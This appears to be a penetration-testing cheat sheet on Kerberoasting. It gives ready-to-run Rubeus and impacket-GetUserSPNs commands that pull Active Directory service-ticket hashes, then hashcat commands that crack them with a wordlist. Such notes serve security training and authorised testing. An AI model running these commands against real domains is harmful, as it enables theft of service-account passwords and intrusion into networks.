Kerberoasting
Kerberoasting
Type 1: Using Windows and Kali Linux
Type 2: using only kali linux
Last updated
Last updated
# In this get the ticket of service account and then try to get the clear text password.
# we will need Rubeus.exe File. This we can download from the above git repo and then send it to Windows using SMB or iwr.
# Command to perform kerberoasting using rubeus(Windows):
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
# After it has finished Hash will be stored in hashes.kerberoast file. This possible if any kerberosatable user is found: "Total kerberoastable users : 1"
# We can then find the hash type of the hash and then crack it using hashcat.
# To use hash cat you need to transfer the file to Kali Linux using SMB.
# Example to crack the password:
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force# In this get the ticket of service account and then try to get the clear text password.
# If you have multiple user check for them also
# We will use impacket-GetUserSPNs module for Kerberoasting.
sudo impacket-GetUserSPNs -request -dc-ip $ip_of_dc <Domain_Name>/<Username>:'<password>' -outputfile hashes.kerberoast
# Example: sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete
# "-request" : to obtain the TGS and output them in a compatible format for Hashcat
# Now we can use hashcat with proper hash type to decrypt the hash found.
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force